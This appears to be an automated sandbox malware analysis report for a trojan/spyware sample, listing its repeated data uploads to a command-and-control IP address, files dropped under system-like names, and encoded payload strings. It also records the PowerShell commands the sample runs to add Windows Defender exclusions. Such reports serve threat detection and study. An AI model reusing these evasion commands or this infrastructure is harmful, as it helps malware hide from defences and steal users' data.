Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2564Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: multipart/form-data; boundary=----09pDRrD0nZucDbA3LEhaxRdEovAqcnN7dgUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 217102Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2148Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2124Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2560Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2564Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2108Expect: 100-continueConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://109.107.182.145/
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://109.107.182.145/ExternalVm_CpuGameWindows.php
Source: powershell.exe, 00000001.00000002.2656640543.000001BDF7D80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2654509364.000002836EA10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micros
Source: powershell.exe, 00000001.00000002.2444317338.000001BD90075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2471826648.0000017490075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2731389868.000001DB291A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.1975526047.000001DB19358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1810438460.000001BD80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1855541530.0000028356938000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1876718568.000001DC29717000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1814710733.0000017480228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1975526047.000001DB19358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: fDTPlvsGfH.exe, 00000000.00000002.1670534980.0000000002681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1810438460.000001BD80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1855541530.0000028356711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1876718568.000001DC294F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1814710733.0000017480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1975526047.000001DB19131000.00000004.00000800.00020000.00000000.sdmp, nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1810438460.000001BD80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1855541530.0000028356938000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1876718568.000001DC29717000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1814710733.0000017480228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1975526047.000001DB19358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000008.00000002.1975526047.000001DB19358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2653419167.000001BDF7D4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: powershell.exe, 00000008.00000002.2811470724.000001DB315B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000004.00000002.2632823645.000001DC416B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000001.00000002.1810438460.000001BD80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1855541530.0000028356711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1876718568.000001DC294F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1814710733.0000017480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1975526047.000001DB19131000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.2731389868.000001DB291A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2731389868.000001DB291A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2731389868.000001DB291A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.1975526047.000001DB19358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2444317338.000001BD90075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2471826648.0000017490075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2731389868.000001DB291A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: fDTPlvsGfH.exe, s67.cs Long String: Length: 1085504
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Windows\Downloaded Program Files\MoUsoCoreWorker.exe Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Windows\Downloaded Program Files\MoUsoCoreWorker.exe\:Zone.Identifier:$DATA Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Windows\Downloaded Program Files\1f93f77a7f4778 Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Code function: 0_2_00007FFD9B8C3415 0_2_00007FFD9B8C3415
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Code function: 0_2_00007FFD9B8B1EC3 0_2_00007FFD9B8B1EC3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B8853F2 1_2_00007FFD9B8853F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B8853F2 4_2_00007FFD9B8853F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFD9B9630E9 6_2_00007FFD9B9630E9
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\AHvxDOtC.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\AZWFwAgV.log CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
Source: fDTPlvsGfH.exe, 00000000.00000002.1742365987.000000001BC9F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs fDTPlvsGfH.exe
Source: fDTPlvsGfH.exe, 00000000.00000002.1742365987.000000001BC9F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs fDTPlvsGfH.exe
Source: fDTPlvsGfH.exe, 00000000.00000000.1623414051.0000000000062000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs fDTPlvsGfH.exe
Source: fDTPlvsGfH.exe, 00000000.00000002.1739558969.000000001B232000.00000002.00000001.01000000.00000000.sdmp Binary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs fDTPlvsGfH.exe
Source: fDTPlvsGfH.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: fDTPlvsGfH.exe, E32.cs Cryptographic APIs: 'TransformBlock'
Source: fDTPlvsGfH.exe, E32.cs Cryptographic APIs: 'TransformFinalBlock'
Source: fDTPlvsGfH.exe, E32.cs Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: fDTPlvsGfH.exe, s67.cs Base64 encoded string: (large Base64 payload omitted)
Source: fDTPlvsGfH.exe, 8B6.cs Base64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
Source: fDTPlvsGfH.exe, 76n.cs Base64 encoded string: 'KFedVk6Jp6daKp14vgxDdZRktmOg5lwc5CA7/fZyiXHMJeSDNVMb6pS/Ws+8RCCzFnl8vTvVDhuqGlce+glEtxuqKS8O8c3gtQa1djaWX8mSMgRcZkKB/b1CbeNC8zbp/fFbbK3TR40223KM0fny1Q==', 'L0WK91MRN8GPeU+oikW92KUnyNkiIPnSvolXk+UKA1aI3vP6rVo6Me+pxgOllrKJDdcmOZ4Adlt6PE9bkEGQVEwEvDCQKnoRPibOJmhL7yvD+1TdQ9V8ZvXogsu4ei+AJzju2B/7qIn98KgLxRcntHsrKHzTDgFsGp0v47jfJgF90xsw1m8GRmidRSyW2hoEPmZLPOgf+RtuUG1euK3l1Naou827rapizdphJfuIw6pLdyR0oIKGmg137zZaRZd6'
Source: fDTPlvsGfH.exe, 52Z.cs Base64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@27/397@0/2
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\hGwsXsdP.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5980:120:WilError_03
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6980:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\e32e8e8116ffca3524c66ea65e2eea691227f6f4e844f9dca8aabb77b799c790
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6264:120:WilError_03
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\AppData\Local\Temp\v1ufzUQx4z Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\46FAiS0S6O.bat"
Source: fDTPlvsGfH.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: fDTPlvsGfH.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: fDTPlvsGfH.exe ReversingLabs: Detection: 78%
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File read: C:\Users\user\Desktop\fDTPlvsGfH.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\fDTPlvsGfH.exe "C:\Users\user\Desktop\fDTPlvsGfH.exe"
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe'
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Downloaded Program Files\MoUsoCoreWorker.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Start Menu\Programs\Accessories\csrss.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\46FAiS0S6O.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe "C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe' Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Downloaded Program Files\MoUsoCoreWorker.exe' Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe' Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe' Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Start Menu\Programs\Accessories\csrss.exe' Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\46FAiS0S6O.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe "C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe"
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
